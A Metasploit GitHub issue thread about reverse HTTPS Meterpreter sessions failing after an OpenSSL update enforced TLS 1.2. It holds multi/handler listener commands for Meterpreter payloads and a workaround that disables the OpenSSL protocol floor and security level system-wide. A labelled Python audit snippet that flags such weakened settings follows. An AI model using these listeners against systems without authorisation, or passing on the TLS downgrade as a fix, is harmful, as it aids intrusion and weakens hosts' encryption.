Need Http / Https Meterpreter TLS/Cert Update #10903

Open
H4xl0r opened this issue Nov 2, 2018 · 4 comments

Comments

@H4xl0r

commented Nov 2, 2018

Http / Https Meterpreter Connection errors after openssl update.

Steps to reproduce

How'd you do it?

(running Kali up-to-date)
1. Updated to openssl OpenSSL 1.1.1 11 Sep 2018
2. Using http / https meterpreter stagers / nonstagers

Expected behavior

Executing meterpreter http / https on target.
What should happen?
Getting connection.

Current behavior

Not getting a connection, I think it's a cert error.
What happens instead?
Not getting a connection

After changing settings in openssl.cnf all works again.

HINTS

Changes in openssl lead to use of TLS 1.2 and several improvements.
Increase default security level from 1 to 2. This moves from the 80 bit security level to the 112 bit security level and will require 2048 bit RSA and DHE keys.

The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client.

Metasploit version

Kali Linux up-to-date version.

OS

Kali Linux

TEMP FIX:
CHANGE openssl.cnf

MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2
To
MinProtocol = None
CipherString = DEFAULT

@H4xl0r H4xl0r changed the title from "Need Http / Https Meterpreter Cert Update" to "Need Http / Https Meterpreter TLS/Cert Update" Nov 2, 2018

@sempervictus

Contributor

commented Nov 3, 2018

I thought we exposed the TLS version to use on server sockets as a data store option...
Could you show us your handler config (options and advanced) please?

@H4xl0r

Author

commented Nov 3, 2018

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_https
set LHOST 192.168.1.20
set LPORT 1111
set ExitOnSession false
set VERBOSE true
exploit -j

and

use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_https
set LHOST 192.168.1.20
set LPORT 2222
set ExitOnSession false
set VERBOSE true
set HandlerSSLCert /root/Schreibtisch/Metasploit/Certs/domain/keycert.pem
set stagerverifysslcert true
exploit -j
(cert is a cert from letsencrypt for the domain I am using)

No Advanced options so far ....
Must be something with the TLS ...
The Meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET.
TLS 1.0 is not accepted anymore with the openssl update, must be 1.2 minimum.

Temp workaround
CHANGE openssl.cnf
from
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2

To
MinProtocol = None
CipherString = DEFAULT

@sempervictus

Contributor

commented Nov 4, 2018

Try setting SSLVersion to TLS1.2, not sure if it'll be properly exposed in the handler, if not, we'll need to make some "minor wiring adjustments."

@H4xl0r

Author

commented Nov 5, 2018

I think "minor wiring adjustments." are needed :-(
openssl update changed the defaults to minimum tls1.2 eg: (openssl.conf)
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2
so when I run with these settings, no meterpreter connects back.
(IS using tlsv1.2 minimum)

if changing (openssl.conf)
MinProtocol = None
CipherString = DEFAULT
then it works again.
I think it is using another (lower) TLS than 1.2 ....
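
Added example, not part of the issue thread or of Metasploit: a small Python check that reads an openssl.cnf and reports whether MinProtocol or CipherString sit below the TLSv1.2 / SECLEVEL=2 values quoted above, which is how a host still carrying the temporary workaround can be found. The function name `audit_openssl_cnf` and the section name `system_default_sect` in the samples are assumptions; the sample files are constructed.

```python
import re

# Rank of MinProtocol values accepted by OpenSSL's config ("None" = no floor).
PROTO_RANK = {"None": 0, "SSLv3": 1, "TLSv1": 2, "TLSv1.1": 3,
              "TLSv1.2": 4, "TLSv1.3": 5}
FLOOR = "TLSv1.2"    # post-update default quoted in the issue
MIN_SECLEVEL = 2     # post-update default quoted in the issue

def audit_openssl_cnf(text):
    """Return (section, key, value, reason) tuples for settings below the floor."""
    findings, section = [], "(global)"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        header = re.fullmatch(r"\[\s*(\S+)\s*\]", line)
        if header:
            section = header.group(1)
            continue
        key, sep, value = (part.strip() for part in line.partition("="))
        if not sep:
            continue
        if key == "MinProtocol":
            # Unknown values rank -1, so they are flagged for manual review.
            if PROTO_RANK.get(value, -1) < PROTO_RANK[FLOOR]:
                findings.append((section, key, value, "protocol floor below " + FLOOR))
        elif key == "CipherString":
            level = re.search(r"@SECLEVEL=(\d+)", value)
            if level is None:
                findings.append((section, key, value, "no explicit SECLEVEL"))
            elif int(level.group(1)) < MIN_SECLEVEL:
                findings.append((section, key, value, "SECLEVEL below %d" % MIN_SECLEVEL))
    return findings

# Constructed samples; the section name is an assumption, the values are from the issue.
STRICT = """[system_default_sect]
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2
"""
RELAXED = """[system_default_sect]
# MinProtocol = TLSv1.2
MinProtocol = None
CipherString = DEFAULT
"""

if __name__ == "__main__":
    for name, cnf in (("strict", STRICT), ("relaxed", RELAXED)):
        print(name, audit_openssl_cnf(cnf))
```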
